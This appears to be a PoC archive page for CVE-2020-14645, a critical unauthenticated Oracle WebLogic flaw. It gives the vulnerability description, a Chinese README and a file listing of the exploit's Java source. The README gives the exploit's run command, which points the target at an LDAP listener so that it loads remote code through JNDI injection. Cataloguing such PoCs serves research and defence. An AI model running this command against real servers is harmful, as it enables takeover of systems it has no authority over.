Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-14645 PoC — Oracle Fusion Middleware WebLogic Server Core组件安全漏洞

Source
Associated Vulnerability
Title:Oracle Fusion Middleware WebLogic Server Core组件安全漏洞 (CVE-2020-14645)
Description:Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Readme
# CVE-2020-14645

## 使用方法

首先使用[NDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md)监听,并生成一个ldap地址。


`java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]`

-Tatget 和-RMI必填,https可使用--SSL参数,-Port默认7001。

自行编译需要添加coherence.jar和wlfullclient.jar
### 漏洞参考:
https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247484377&idx=1&sn=01d62d175127099275a243ab5fe02bc3&chksm=f9ee6f66ce99e670dbb6da2a3648ea5f6a91fa503441dccd903f44e76883019890d8a9701a29&scene=158#rd
### 代码参考:
https://github.com/Y4er/CVE-2020-2883
File Snapshot

[4.0K] /data/pocs/d21a2a036e672defe6e7d36846a475483ffc7bfc ├── [ 695] README.md └── [4.0K] src ├── [4.0K] META-INF │   └── [ 52] MANIFEST.MF ├── [4.0K] pub │   └── [4.0K] fuzz │   ├── [3.9K] main.java │   ├── [4.0K] t3 │   │   └── [4.5K] T3ProtocolOperation.java │   └── [4.0K] utils │   ├── [1.9K] BytesOperation.java │   ├── [1.1K] Reflections.java │   ├── [ 982] Serializables.java │   └── [ 227] SocketFactory.java └── [1.7K] test.java 6 directories, 9 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →